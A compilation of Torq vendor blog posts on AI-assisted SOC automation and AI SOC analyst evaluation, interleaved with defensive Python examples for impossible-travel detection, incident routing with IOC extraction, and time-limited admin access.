Use Case #2: Reduce MTTR with Automated MITRE ATT&CK Tagging

Manually identifying and tagging MITRE ATT&CK tactics, techniques and procedures is time-consuming. Socrates streamlined this process by automatically linking and tagging threats with relevant MITRE ATT&CK tactics, techniques, and procedures (TTPs). 

The AI Agent parses case data, file hashes, process names, network connections, and behavior patterns, and distills them into discrete observables. Socrates cross-references each observable against the latest MITRE ATT&CK framework — pinpointing not just the primary tactic but also related sub-techniques and procedures.

For each matched TTP, Socrates auto-tags the case, links to relevant playbooks, and correlates with past incidents that used the same methods.

Finally, the AI generates a concise report section that shows:

  • Tactic: TA0011 – Command and Control
  • Technique: T1219 – Remote Access Software
  • Procedure: njRAT reverse shell delivered via Ruby script on EC2 instance.
  • Confidence: 92%
  • Potential Impact: Successful execution of these TTPs can lead to unauthorized access and control of critical systems, leading to data breaches or disruptions.
  • Next Steps: Trigger the containment playbook, notify the Tier-2 SOC analyst team, and run a full asset sweep.

Result: Analysts no longer spend time manually tagging or correlating cases, which helps reduce MTTR and increase consistency across investigations.

Socrates auto-tagged MITRE ATT&CK TTPs for a reverse shell incident, cutting MTTR and surfacing next steps in seconds.

Use Case #3: Investigate and Close an Impossible Travel Alert in Minutes 

Okta flagged suspicious logins from Austria, Singapore, and Brazil for a single user within a 30-minute window, an impossible travel scenario indicating potential compromise. 

Socrates autonomously checked the user’s leave status in Workday and calendar systems. Next, Socrates messaged the employee on Slack, capturing their response directly into the case notes. Simultaneously, it enriched each login IP against external threat intelligence feeds, scoring them for risk and historical malicious activity. 

Socrates then compared the session details against the user’s normal behavior baseline to spot anomalies. Finally, because the user had confirmed the unusual travel and all IP reputations returned legitimate, Socrates marked the alert as a benign true positive, documented the reasoning, and closed the case. 

Result: This workflow took under three minutes, reducing MTTR and giving analysts hours back by eliminating manual checks and unnecessary escalations.

Socrates investigated suspicious Okta logins, cross-checked HR systems, messaged the user, and closed the alert autonomously.
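The impossible-travel alert above is worth showing as arithmetic, because the same check is what an analyst should be able to re-run before trusting a vendor's flag. The block below is an added example, not Torq or Okta code: it computes the implied speed between consecutive logins for each user, then applies the closing rule the case used (the user confirmed the travel and every IP came back clean). The login records, city coordinates, speed ceiling and reputation vocabulary are constructed assumptions.

```python
"""Impossible-travel check and disposition for identity-provider logins.

Added example, not Torq or Okta code. The login events and coordinates are
constructed (approximate city centres); the 1,000 km/h speed ceiling and the
"benign true positive" rule are assumptions to tune to your own policy.
"""
from datetime import datetime, timedelta, timezone
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 1000.0          # assumed: a little above airliner cruise speed
MIN_GAP = timedelta(minutes=1)      # floor so near-simultaneous logins don't divide by ~0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two WGS84 points, in kilometres."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlmb = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def impossible_travel(logins, max_kmh=MAX_PLAUSIBLE_KMH):
    """Flag consecutive logins per user whose implied speed exceeds max_kmh.

    Each login is a dict with user, ts (timezone-aware datetime), ip, country, lat, lon.
    Logins from the same IP are skipped: no movement is implied.
    """
    by_user = {}
    for ev in logins:
        by_user.setdefault(ev["user"], []).append(ev)
    findings = []
    for user, evs in by_user.items():
        evs = sorted(evs, key=lambda e: e["ts"])
        for a, b in zip(evs, evs[1:]):
            if a["ip"] == b["ip"]:
                continue
            dist_km = haversine_km(a["lat"], a["lon"], b["lat"], b["lon"])
            gap = max(b["ts"] - a["ts"], MIN_GAP)
            speed = dist_km / (gap.total_seconds() / 3600.0)
            if speed > max_kmh:
                findings.append({"user": user, "from": a["country"], "to": b["country"],
                                 "ips": (a["ip"], b["ip"]), "minutes": gap.total_seconds() / 60.0,
                                 "km": round(dist_km), "kmh": round(speed)})
    return findings


def disposition(findings, user_confirmed: bool, ip_reputation: dict) -> str:
    """Close as benign only when the user confirmed AND every IP involved is clean.

    ip_reputation maps ip -> "clean" | "suspicious" | "malicious" (assumed vocabulary,
    normally filled from threat-intel enrichment). Anything else escalates.
    """
    if not findings:
        return "no_finding"
    ips = {ip for f in findings for ip in f["ips"]}
    all_clean = all(ip_reputation.get(ip) == "clean" for ip in ips)
    if user_confirmed and all_clean:
        return "benign_true_positive"
    return "escalate_to_analyst"


# Constructed sample logins (not real data).
SAMPLE_LOGINS = [
    {"user": "j.doe", "ts": datetime(2025, 3, 4, 9, 0, tzinfo=timezone.utc),
     "ip": "203.0.113.10", "country": "AT", "lat": 48.21, "lon": 16.37},    # Vienna
    {"user": "j.doe", "ts": datetime(2025, 3, 4, 9, 12, tzinfo=timezone.utc),
     "ip": "198.51.100.20", "country": "SG", "lat": 1.35, "lon": 103.82},   # Singapore
    {"user": "j.doe", "ts": datetime(2025, 3, 4, 9, 28, tzinfo=timezone.utc),
     "ip": "192.0.2.30", "country": "BR", "lat": -23.55, "lon": -46.63},    # Sao Paulo
    {"user": "a.smith", "ts": datetime(2025, 3, 4, 8, 0, tzinfo=timezone.utc),
     "ip": "203.0.113.77", "country": "AT", "lat": 48.21, "lon": 16.37},
    {"user": "a.smith", "ts": datetime(2025, 3, 4, 16, 0, tzinfo=timezone.utc),
     "ip": "203.0.113.78", "country": "AT", "lat": 48.21, "lon": 16.37},
]

if __name__ == "__main__":
    hits = impossible_travel(SAMPLE_LOGINS)
    for h in hits:
        print(f"{h['user']}: {h['from']}->{h['to']} {h['km']} km in {h['minutes']:.0f} min ({h['kmh']} km/h)")
    clean = {ip: "clean" for ip in ("203.0.113.10", "198.51.100.20", "192.0.2.30")}
    print(disposition(hits, user_confirmed=True, ip_reputation=clean))
```

Note that disposition() requires both conditions; a user saying "yes, that was me" over Slack is weak evidence on its own if the account is already in an attacker's hands, so a dirty IP still escalates regardless of the reply.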

You Wanna See Some Real Speed?

These aren’t theoretical benefits — they’re proof points from the frontlines of modern AI-powered SOCs. When the powers of Hyperautomation, AI, and intelligent case management are combined in Torq HyperSOC, your team doesn’t just move faster; they move smarter. 

Instead of being bogged down, analysts are empowered to lead, strategize, and scale across complex environments. That’s how you reduce risk, retain talent, and prove real value.

Want to see HyperSOC in action? Book a demo now — and don’t miss our Field CISO’s guide full of practical advice for building a more efficient SOC.

CISOs’ Unconventional Criteria for Evaluating AI SOC Analysts


Noam Cohen, Director of AI at Torq

Noam Cohen is a serial entrepreneur building seriously cool data and AI companies since 2018. Noam’s insights are informed by a unique combination of data, product, and AI expertise — with a background that includes winning the Israel Defense Prize for his work in leveraging data to predict terror attacks. As the Head of Artificial Intelligence at Torq, Noam is helping build truly next-gen AI capabilities into Torq’s autonomous SOC platform.

Still obsessing over compliance certifications and data volumes when choosing your AI SOC analyst? You might as well be that guy at the dealership kicking tires and demanding V8 specs while ignoring the self-driving capabilities. 

Today’s CISO battlefield isn’t won with yesterday’s metrics. While AI security vendors sell you on training corpus size and customization options, you should be demanding zero-day detection without signatures and unified threat visibility. 

Let’s be brutally honest: the blistering pace of AI innovation means your current AI SOC evaluation checklist is obsolete. GenAI marked an inflection point; now, agentic AI is completely disrupting SecOps. This means the real competitive edge lies in capabilities your procurement team isn’t even asking about.

So, what should CISOs look for in an AI SOC analyst? Below, we break down 8 key capabilities that you might not have considered but are crucial to ensure AI trust and effectiveness in your SOC.

What to Look for in an AI SOC Analyst Evaluation

1. AI That Simplifies and Communicates Context

Look for: Next-gen AI for the SOC that shows sophistication beyond query-response models, demonstrating a nuanced understanding and delightful communication of organizational context, ongoing security incidents, and specific scenarios. 

Rather than summarizing in a generic “TL;DR” format, the AI should communicate about logs, case artifacts, and indicators of compromise (IOCs) through a cybersecurity-oriented UI that highlights key information for the specific security context. 

Ask:

  • Can the AI maintain contextual continuity across analyst shifts and SOC handoffs?
  • How does the chat UI maintain context for the user when referencing information-heavy items like logs and cases?
  • Does the AI have different user views for summarizing actions, IOCs, and alerts?
  • Where can I embed our knowledge and policies to guide the AI’s interactions?

General example: 

General example showing how a smart reference summarization popup from Arc (The Browser Company) helps users quickly understand selected text or an entire webpage without leaving their current browser.

2. AI for the Entire Team

Look for: Practical AI capabilities mapped explicitly to real-world SOC workflows and use cases.

The AI SOC analyst should do the actual, gritty tasks your SOC team performs daily — from initial triage to investigating alerts, hunting for threats, and remediating problems. This isn’t about general intelligence; it’s about directly supporting actual analyst workflows from end to end. If you use a multi-agent system (MAS), the AI SOC analyst should act as an OmniAgent to coordinate and collaborate with multiple specialized AI agents to accomplish these complex security goals.

Ask:

  • What analyst-level jobs does the AI accelerate (e.g. query writing, unstructured enrichment, and response recommendations)?
  • How does the AI SOC agent accelerate threat hunting and detection engineering through intelligent hypothesis generation?
  • Is the system capable of auto-healing errors in security workflows the way a good security engineer can?

General example:

General example showing how Gemini’s Gem store features different chatbots for Marketing, Sales, and Developers.

3. AI That Explains What It’s Doing

Look for: AI that grounds its findings and recommendations in clear, structured explanations showing its sources.

CISOs increasingly prioritize “explainability” in AI decisions as a pragmatic imperative for achieving cognitive alignment between the AI SOC analyst and the human security team. To foster trust, adoption, and effective action, your security team must have a line of sight into the AI’s reasoning, not just its conclusions.

Ask:

  • Does the AI SOC analyst clearly explain why particular security events are flagged or escalated?
  • How easily can human analysts validate or challenge the AI’s recommendations? For instance, can they request source links, exact quotes, or highlighting?
  • Do we have visibility into the AI agent’s self-critique step?
  • What validation guardrails does the AI implement?

General examples:

General examples showing how two AI models surface the data they rely on: Perplexity shows a snippet of the source, while NotebookLM highlights the exact sentence it used from the source.

4. AI That’s Easy to Interact With — Without Training

Look for: A SOC-specific user interface that is genuinely intuitive, innovative, and frictionless and that directly enhances analyst productivity, retention, and job satisfaction.

Even the most powerful AI can be hampered by a clunky or difficult interface, undermining your team’s effectiveness and morale and discouraging AI adoption. A truly innovative interface should feel natural to use and streamline workflows, not add complexity or friction to processes. An intuitive design enables analysts of any level to quickly access insights and take action without specialized skills or knowledge.

Ask:

  • How much do our human analysts need to be familiar with AI hacks and general prompt engineering, such as knowing when to use deep search options, ask for a specific data format, or open a new conversation thread?
  • Does the AI SOC analyst support conversational SIEM queries and natural-language threat exploration?
  • How does the AI communicate its planning and thinking process?
  • In autopiloting, can I interrupt the investigation before the AI is done?

General example:

General example showing how Perplexity creates a simpler user experience by auto-choosing the model according to its research, rather than making the user choose a model by task/prompt. 

5. AI That Helps You Get Ahead

Look for: An AI SOC analyst that doesn’t only react to known threats but proactively guides SOC teams towards improving security posture and operational effectiveness. 

Think of your top analysts — the ones who are always one step ahead, anticipating your team’s needs and suggesting improvements without being asked. Agentic AI that performs at this advanced level can act as a virtual extension of your team, identifying weaknesses and suggesting optimizations to elevate your security operations.

Ask:

  • Can the AI SOC analyst proactively detect and suggest SOC operational improvements, such as recommending repetitive manual processes that are ripe for automation?
  • Can it automatically correlate cases with incident history and recommend improvements?
  • Has your AI ever caught a missing step in its instructions and fixed it (or asked about it) before executing?
  • Can the AI automatically tag and store important information from your interactions that can help in future cases?
  • Will the AI suggest changes to the detection rules, workflows, or playbooks? How often does your AI flag inefficiencies in workflows?

General example: 

General example of ChatGPT maintaining context after you’ve told it that you are an AI product manager in San Francisco. When asking it to brainstorm messaging for a social post celebrating an achievement, ChatGPT already knows where to start. 

6. AI That Understands What You Really Want (and Can Figure Out How to Do It)

Look for: Deterministic, agentic AI that understands how to break a user intent into multiple tasks, which may require different execution plans

Good AI gets a task and starts working. Great AI first looks for communication gaps, understands the goal, and asks for more instructions when needed. Ideally, the user shouldn’t have to think like the AI to ensure the AI grasps their intent — the AI should understand how the user thinks and ask clarifying questions when needed.

A structured execution scheme reduces ambiguity and improves the accuracy of the AI’s planning and orchestration, reducing the likelihood of the AI agent skipping steps, going out of order, selecting incorrect tools, or misinterpreting instructions.

Ask:

  • When I give the AI a vague or complex instruction, does it ask clarifying questions — or just charge ahead?
  • How does it use screens, user information, and past sessions to better understand the user’s specific intent?
  • Can your AI break down a high-level goal (‘Investigate this alert’) into a sequence of logically ordered tasks — and tell you why?
  • Can your AI explain its execution plan in plain language before it starts and adjust if you push back?

General example:

General example showing how ChatGPT asks clarification questions before building a report in Deep Research.

7. An AI Assistant That You Don’t Need to Babysit

Look for:  Agentic AI capable of autonomously chaining together multiple actions without constant human prompts. 

Your human analysts don’t want to click through 10 steps every time they need the AI to take action. While human oversight of critical decisions is important, to efficiently investigate an alert end-to-end and even initiate containment, an AI SOC analyst must be capable of independently stringing together a sequence of relevant subtasks — like log collection, enrichment, reverse engineering, and containment suggestions — in pursuit of a high-level goal.

Ask:

  • Can the AI SOC analyst complete a multi-step investigation with one high-level instruction?
  • Can the AI write and execute deterministic workflows when needed?
  • Does it pause and check with human analysts before executing sensitive tasks (e.g., blocking users or IPs)?
  • When given a high-level goal or non-playbook scenario, does the AI independently decide which steps to take and in what order?
  • How does the AI identify when not to act — and escalate to a human when it hits a confidence or authority threshold?

General example:

General example of how Intercom’s Fin interface defines the moments where a human needs to be looped into the convo.

8. AI That Gets More Helpful Through Human Feedback

Look for: An AI SOC analyst that continuously learns and improves by observing and incorporating feedback from human analyst behavior.

The best AI SOC analysts learn from human analyst behavior to become more effective and accurate over time. Think of it as shaping the ideal analyst that shadows your team, watches how they triage alerts, write queries, and handle false positives — and gets smarter with every interaction.

Human analysts should be able to fine-tune and correct AI as threats evolve rather than treating it as a black box. In practice, features like thumbs-up/down ratings, interactive retraining, or the ability to override AI decisions make the human–AI loop tighter and more effective.

Ask:

  • How does the AI SOC analyst adapt based on human analysts’ corrections or preferences over time?
  • Can I adjust the AI’s prioritization or response style via feedback?
  • How can the user flag a successful conversation with the AI to make future sessions easier and more effective?
  • Can you review and audit what the AI has learned from your team? 

General example: 

General example showing how Cursor’s Coding Rules feature helps developers continuously improve and adapt their preferences using natural language. 

Next-Gen AI for the SOC is Here — Are You Ready?

Don’t be the security leader who marvels at a shiny paint job while ignoring the revolutionary engine. When evaluating AI SOC analysts, focus on explainable intelligence, seamless integration into your team’s workflow, and deterministic AI that can independently plan and orchestrate all of the actions required to complete a high-level goal from end to end.

Finding an AI SOC analyst that truly understands context, empowers your analysts, and acts with proactive autonomy will ensure you’re not just keeping up with the latest tech but investing in a force multiplier for your security team.

Get the AI or Die Manifesto to learn strategic considerations, get insights from a CISO, and learn red flags and more questions to ask for an AI SOC evaluation.

The Future of Retail Cybersecurity: SOC Automation


Retail companies are high-value targets for cybercriminals. With sprawling infrastructures, complex supply chains, and large amounts of customer data, retailers are a goldmine for bad actors. In 2024, the retail sector accounted for 24% of all cyberattacks — more than any other industry. The average cost of a data breach in retail rose to $3.28 million.

Meanwhile, security teams in the retail sector face increasing pressure to maintain uptime, protect consumer data, and streamline operations across global environments. This is where security Hyperautomation comes in.

Below, we explore key retail cybersecurity use cases for security Hyperautomation and spotlight how a fashion retail giant used Torq to cut ticket response times and scale SOC operations across global markets.

Why Retail Cybersecurity Teams Need SOC Automation

Retail has become one of the most targeted industries, accounting for one in four cyberattacks. Phishing, ransomware, and credential theft are the leading threats driven by attackers looking to exploit high volumes of customer data and payment information.

The rise of e-commerce (84% of consumers now shop online) and global retail operations has dramatically expanded the attack surface. Add distributed teams and ever-tightening compliance demands — and it’s no wonder retail cybersecurity processes are struggling to keep up.

Top retail SOC challenges include: 

  • High alert volumes with limited analyst headcount
  • Manual ticket handling and case management
  • Access and identity control challenges
  • Customer service expectations and compliance demands

SOC automation, powered by Torq Hyperautomation™, is the engine that addresses these challenges. By leveraging specialized AI Agents, Torq Hyperautomation helps retailers eliminate repetitive work, accelerate incident response, and gain visibility across global environments, all without needing to rip and replace their security stack.

Top Retail Cybersecurity Challenges Solved by Hyperautomation

Below are the top use cases being Hyperautomated by Torq’s retail cybersecurity customer base, along with real-world examples of the workflows they have built.

1. Security Case Management 

Automate the ingestion and processing of security incidents from Wiz. For “open” incidents, facilitate the creation and management of security cases with enriched data and actionable insights.

Workflow Steps:

  1. Filter Wiz event data to select incidents with status ‘OPEN’ and severity ‘MEDIUM’, ‘HIGH’, or ‘CRITICAL’.
  2. Transform data using Data Agent (AI-generated data transformation) operator to prepare it for case creation.
  3. Create a new case with detailed incident information and links.
  4. Add a quick action button to the case for advancing investigation phases based on the assigned runbook.
  5. Extract indicators of compromise (IOCs) from incident alerts.
  6. Populate observables within the security case with the newly extracted IOCs.
  7. Update case severity based on incident severity, then:
    1. IF case severity changes to ‘CRITICAL’ or ‘HIGH’, change the case state to ‘TRIAGE’ and assign the case to the appropriate Tier-2 analyst. 
    2. IF case severity changes to ‘MEDIUM’ or ‘LOW’, change the case state to ‘TRIAGE’ and assign the case to Socrates, Torq’s AI SOC Analyst, for remediation.
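Steps 1 through 7 above map to a small amount of code. The following is an added example in plain Python, not a Torq workflow export; the Wiz event fields, the assignee identifiers and the allowlisted domain are assumptions, and the sample events are constructed. It also covers the case the steps leave implicit: a LOW incident can only reach step 7 if the filter in step 1 is widened, so route() accepts LOW rather than failing on it.

```python
"""Wiz-style incident ingestion, IOC extraction and severity-based case routing.

Added example in plain Python; it is not a Torq workflow export. The event
schema (id, status, severity, title, description), the assignee names and the
allowlisted domain are assumptions, and the sample events are constructed.
"""
import re

ACTIONABLE_STATUS = "OPEN"
ACTIONABLE_SEVERITIES = {"MEDIUM", "HIGH", "CRITICAL"}

# Observable extractors. The domain pattern is deliberately narrow; widen the
# TLD list for production use.
IOC_PATTERNS = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "sha256": re.compile(r"\b[a-fA-F0-9]{64}\b"),
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|xyz)\b", re.IGNORECASE),
}
ALLOWLISTED_DOMAINS = {"wiz.io"}   # assumed: vendor/own domains that are not observables


def select_open_incidents(events):
    """Step 1: keep only OPEN incidents at MEDIUM/HIGH/CRITICAL, in arrival order."""
    return [e for e in events
            if e.get("status") == ACTIONABLE_STATUS and e.get("severity") in ACTIONABLE_SEVERITIES]


def extract_iocs(text: str) -> dict:
    """Steps 5-6: pull observables out of free text, de-duplicated per type."""
    found = {kind: set(pat.findall(text)) for kind, pat in IOC_PATTERNS.items()}
    found["domain"] = {d.lower() for d in found["domain"]} - ALLOWLISTED_DOMAINS
    return {kind: vals for kind, vals in found.items() if vals}


def route(severity: str):
    """Step 7: HIGH/CRITICAL go to a human Tier-2 analyst, the rest to the AI analyst."""
    if severity in {"CRITICAL", "HIGH"}:
        return "TRIAGE", "tier2-analyst"       # assumed assignee identifiers
    if severity in {"MEDIUM", "LOW"}:
        return "TRIAGE", "socrates"
    raise ValueError(f"unknown severity {severity!r}")


def build_case(incident: dict) -> dict:
    """Steps 3-7 for one incident: create the case, attach observables, set state/assignee."""
    state, assignee = route(incident["severity"])
    text = f"{incident.get('title', '')} {incident.get('description', '')}"
    return {
        "source_id": incident["id"],
        "title": incident.get("title", "Untitled incident"),
        "severity": incident["severity"],
        "state": state,
        "assignee": assignee,
        "observables": extract_iocs(text),
    }


def ingest(events):
    """Whole workflow: filter, then build one case per actionable incident."""
    return [build_case(e) for e in select_open_incidents(events)]


# Constructed Wiz-like events (not real findings).
SAMPLE_EVENTS = [
    {"id": "inc-1001", "status": "OPEN", "severity": "CRITICAL",
     "title": "Crypto-miner process on prod worker",
     "description": "Process xmrig (sha256 3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b) "
                    "connected to 203.0.113.45:3333 from i-0ab12cd34. Reported via wiz.io."},
    {"id": "inc-1002", "status": "OPEN", "severity": "LOW",
     "title": "Unused IAM role", "description": "Role has not been assumed in 90 days."},
    {"id": "inc-1003", "status": "RESOLVED", "severity": "HIGH",
     "title": "Public S3 bucket", "description": "Bucket ACL opened to AllUsers; already fixed."},
    {"id": "inc-1004", "status": "OPEN", "severity": "MEDIUM",
     "title": "Suspicious DNS from build host",
     "description": "Host 10.0.4.7 resolved evil-update.xyz repeatedly over the last hour."},
]

if __name__ == "__main__":
    for case in ingest(SAMPLE_EVENTS):
        print(case["source_id"], case["severity"], "->", case["assignee"], case["observables"])
```

The allowlist matters more than it looks: without it, every case would carry the vendor's own domain as an "observable" and the threat-intel lookups in the next workflow would be spent on it.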

2. Threat Intelligence Analysis

Automate the process of retrieving, analyzing, and managing threat intelligence data from CrowdStrike alerts, integrating AI Task Agent operator analysis, and updating case observables.

Workflow Steps:

  1. List CrowdStrike case events and filter them based on [custom] criteria.
  2. Create a session with CrowdStrike, retrieve alert details, and add to case.
  3. Filter and process command line data using the AI Task Agent for analysis.
  4. Extract and filter IOCs from alert details.
  5. Compare new IOCs with existing case observables and identify unique ones.
  6. Trigger a secondary nested workflow to check observables with threat intelligence (Workflow: Parallel execution — VirusTotal, Recorded Future, AlienVault).
  7. Revoke the CrowdStrike session token and exit.

3. Automated Alert Enrichment

Aggregate endpoint information from SentinelOne, Axonius, and Azure AD to enrich security data and support threat intelligence efforts.

Workflow Steps:

  1. Execute parallel processes to gather endpoint details from multiple sources.
  2. Retrieve agent details from SentinelOne using an API call with specified parameters.
  3. Extract key information from SentinelOne data using a JSON query.
  4. Fetch device details from Axonius with a POST request and process the response to extract relevant attributes.
  5. Generate an access token for Microsoft 365 and retrieve device information from Azure AD based on display name.
  6. Compile the gathered data from SentinelOne, Axonius, and Azure AD using AI Task Agent to create a formatted summary of results.

4. Identity Access Request Management

Automate the process of requesting, approving, and granting temporary admin rights to Mac users across different store locations, ensuring compliance and proper authorization.

Workflow Steps:

  1. Search for a Slack user’s email address based on the provided username.
  2. If the email is found, prompt the user to provide a reason for requesting temporary admin rights on their Mac.
  3. Depending on the user’s response, either proceed to find computers and store locations associated with the user’s email, or end the request.
  4. If approved computers are found at the current location, ask the user to select which Mac they need admin rights on.
  5. Request IT approval for granting admin rights.
  6. If approved, temporarily grant admin rights on the selected Mac and notify the user.
  7. After 15 minutes, revoke the admin rights and notify the user of the expiration.
  8. If not approved, notify the user about the denial.
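The security property behind steps 5 through 7 is that admin rights are never granted without approval and never outlive the 15-minute window, even if the revocation job runs late. The block below is an added example, not Torq's workflow: the device inventory, the approver's decision and the clock are injected so it runs offline, and every identifier is made up.

```python
"""Just-in-time local admin with an approval gate and a hard 15-minute expiry.

Added example, not Torq's workflow. The device inventory, the approver
decision and the clock are injected so the whole flow runs offline; the
identifiers are made up.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

GRANT_TTL = timedelta(minutes=15)


class FakeClock:
    """Controllable clock for the demo; use datetime.now(timezone.utc) in production."""
    def __init__(self, start: datetime):
        self.now = start

    def __call__(self) -> datetime:
        return self.now

    def advance(self, delta: timedelta) -> None:
        self.now += delta


@dataclass
class AdminGrant:
    user_email: str
    device_id: str
    reason: str
    granted_at: datetime
    expires_at: datetime
    revoked: bool = False


class JitAdminService:
    """Steps 2-8 of the workflow: justify, scope to the user's own Mac at the current
    store, gate on IT approval, grant with a TTL, revoke on expiry, and audit everything."""

    def __init__(self, inventory: dict, clock):
        self.inventory = inventory     # email -> {store_id -> [device ids]}
        self.clock = clock
        self.grants: list[AdminGrant] = []
        self.audit: list[tuple] = []

    def devices_for(self, email: str, store_id: str) -> list:
        return list(self.inventory.get(email, {}).get(store_id, []))

    def request(self, email, store_id, device_id, reason, it_approved: bool):
        """Return the grant, or None when IT denied it. Bad input raises instead of
        silently granting."""
        if not reason or not reason.strip():
            raise ValueError("a reason is required before the request goes to IT")
        if device_id not in self.devices_for(email, store_id):
            raise PermissionError(f"{device_id} is not assigned to {email} at {store_id}")
        now = self.clock()
        if not it_approved:
            self.audit.append(("denied", email, device_id, now))
            return None
        grant = AdminGrant(email, device_id, reason, now, now + GRANT_TTL)
        self.grants.append(grant)
        self.audit.append(("granted", email, device_id, now))
        return grant

    def has_admin(self, email: str, device_id: str) -> bool:
        """Fail closed: an expired grant is not honoured even before the sweep revokes it."""
        now = self.clock()
        return any(g.user_email == email and g.device_id == device_id
                   and not g.revoked and g.expires_at > now for g in self.grants)

    def sweep(self) -> list:
        """Scheduler hook: revoke every grant past its expiry and return those revoked."""
        now = self.clock()
        revoked = []
        for g in self.grants:
            if not g.revoked and g.expires_at <= now:
                g.revoked = True
                revoked.append(g)
                self.audit.append(("revoked", g.user_email, g.device_id, now))
        return revoked


# Constructed inventory (not real data).
INVENTORY = {"j.doe@example.com": {"store-017": ["MAC-0042"], "store-031": ["MAC-0107"]}}

if __name__ == "__main__":
    clock = FakeClock(datetime(2025, 3, 4, 9, 0, tzinfo=timezone.utc))
    svc = JitAdminService(INVENTORY, clock)
    svc.request("j.doe@example.com", "store-017", "MAC-0042", "Install label printer driver", it_approved=True)
    print("admin now:", svc.has_admin("j.doe@example.com", "MAC-0042"))
    clock.advance(timedelta(minutes=16))
    print("admin after 16 min:", svc.has_admin("j.doe@example.com", "MAC-0042"))
    print("revoked:", [g.device_id for g in svc.sweep()])
```

Two design choices carry the security weight: has_admin() checks the expiry itself rather than trusting the revoked flag, so a delayed or crashed sweep cannot extend the window, and a request for a Mac at another store is rejected before the approver ever sees it.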

5. Daily Health Check

Automate the monitoring and management of security cases and detections, integrating with CrowdStrike and Microsoft Teams for comprehensive incident handling and communication.

Workflow Steps:

  1. Query CrowdStrike events for specific states and severities, starting a custom SLA timer for each based on severity.
  2. Retrieve the current date from each event; check if it is Monday, Wednesday, or Friday to proceed with further actions.
  3. Search for unassigned detections and incidents older than specified hours/days.
  4. Filter and process detection and incident data, collecting details for each unassigned detection and incident.
  5. Summarize findings and send to Microsoft Teams.

Case Study: Fast Fashion Retailer Enhances SOC Efficiency with Hyperautomation

One of the world’s largest fast-fashion retailers was struggling under the weight of manual processes, siloed tools, and a legacy SOAR platform. With thousands of alerts coming in every day, their team was spending most of their time chasing false positives and combing through disjointed systems, leaving little time for meaningful response and strategy. 

The retailer turned to Torq Hyperautomation to modernize their cybersecurity processes. With Torq’s intuitive workflow builder, analysts at all skill levels could build automations in minutes. Torq’s case management system and integrations with the team’s existing security solutions streamlined alert enrichment, triage, and response. They were also able to automate just-in-time access across operating systems, cloud, and hybrid environments, ensuring a streamlined process for administrative workflows.

The retailer now solves end-user tickets in minutes and automates admin access across globally distributed teams. Read the full case study for more.

First, They Killed Their SOAR. Then They Joined Torq.


Before Torq, they were trapped. Buried under alerts. Drowning in old playbooks. Burned out by legacy SOAR tools that promised automation and delivered chaos. Then they discovered Torq, not just as a solution, but as a better way to work. They became power users, rebuilt their workflows, and transformed their SOCs.

Now? They’re former legacy SOAR users — thriving with the ultimate SOAR replacement: Torq.

Meet the team. Hear their stories. And see why switching to Torq wasn’t just the best move they made for their SOC; it was the best move they made for their careers.

Meet the Team That Escaped SOAR Hell

PO shares his SOAR replacement story
Patrick “PO” Orzechowski
Field CISO

PO is Torq’s Field CISO, bringing his years of experience and expertise as a SOC leader to our customers. PO is a seasoned security veteran with a deep understanding of the modern security landscape. You can find him talking to SOC leaders and CISOs from major brands at cybersecurity events worldwide.

Superpower: Connecting across teams, balancing priorities, and helping people align on what matters.

João Ceron
Solution Architect

João is a Solutions Architect at Torq with 15+ years in SOC and network security. He holds a PhD with research on DDoS and IoT security, has published at USENIX Security, and contributed to projects for the Dutch government and U.S. DHS. At Torq, he helps clients implement AI-driven SOC automation.

Superpower: Processing massive amounts of data and turning it into actionable value.

Rich Chen
Sales Engineer

To borrow a line from Wayne’s World, Rich’s career could be summed up as “an extensive collection of name tags and hairnets.” Over nearly 20 years, he’s done it all — teacher, helpdesk, sysadmin, VMware wizard, cybersecurity engineer, and manager. Rich brings deep technical knowledge and a teaching mindset to every customer conversation as Sales Engineer at Torq.

Superpower: Teaching. Whether it’s a teammate or a customer, Rich is always teaching at Torq.

Kyle Dalton
Director, Solutions Architecture

Kyle is the Global Head of Solution Architecture at Torq, where he helps organizations reimagine the modern SOC through security Hyperautomation and agentic AI. A former analyst and engineer with deep hands-on experience, Kyle spent years in the trenches. Today, he brings that frontline perspective to help security teams operationalize response, eliminate burnout, and amplify human impact with Torq HyperSOC™.

Superpower: Listening and turning real-world pain points into better solutions.

Why They Replaced SOAR with Torq

Partnership: “The level of attention and partnership from Torq was unlike anything else. Every meeting and interaction was consistently positive. And it wasn’t just about features — it was about the willingness to build what we needed.” – Patrick Orzechowski

Intuitive user interface: “We were looking at a few vendors. Torq had the most intuitive UI, the best pricing model, and a clear commitment to delivering case management features we needed.” – João Ceron

Built for analysts: “I needed something my analysts could actually use. With Torq, everything just made sense. But honestly, it was the team that sold me. It felt like a true partnership.” – Rich Chen

Pride in every detail: “I could feel the pride that the team takes in the product, and that was huge for me. The team was really committed to the partnership.” – Kyle Dalton

Compare AI-driven Hyperautomation to legacy SOAR.

The Problems Legacy SOAR Couldn’t Solve — But Torq Did

Before joining Torq, Patrick’s team bought into the SOAR promise — that it would automate everything, integrate with everything, and even replace analysts. Instead, it became a scalability nightmare. The platform was slow, clunky, expensive to maintain, and unusable for entry-level analysts. With Torq, everything changed. It was fast, intuitive, and actually usable from day one.

Kyle shared a similar experience. 30% of his team’s time was spent managing an on-prem SOAR implementation. It wasn’t event-driven, which made scaling painful. With Hyperautomation as their SOAR replacement, they quickly expanded integrations and were able to rebuild complex workflows in just hours instead of weeks.

“We were burning 30% of our team’s capacity just managing an on-prem SOAR. That’s how we knew we needed something to replace SOAR. Shifting to Hyperautomation completely changed everything — we dramatically expanded integrations and met customers where they are. What really sealed it was rebuilding a workflow that used to take a week and a half… in under four hours.”

– Kyle Dalton, former legacy SOAR user

Rich brought receipts on how Torq made a massive difference outside traditional SecOps. His team was bogged down by daily manual processes, pulling data from multiple platforms, transforming CSVs, and uploading them all again. Torq eliminated that friction, automating workflows across security and IT operations.

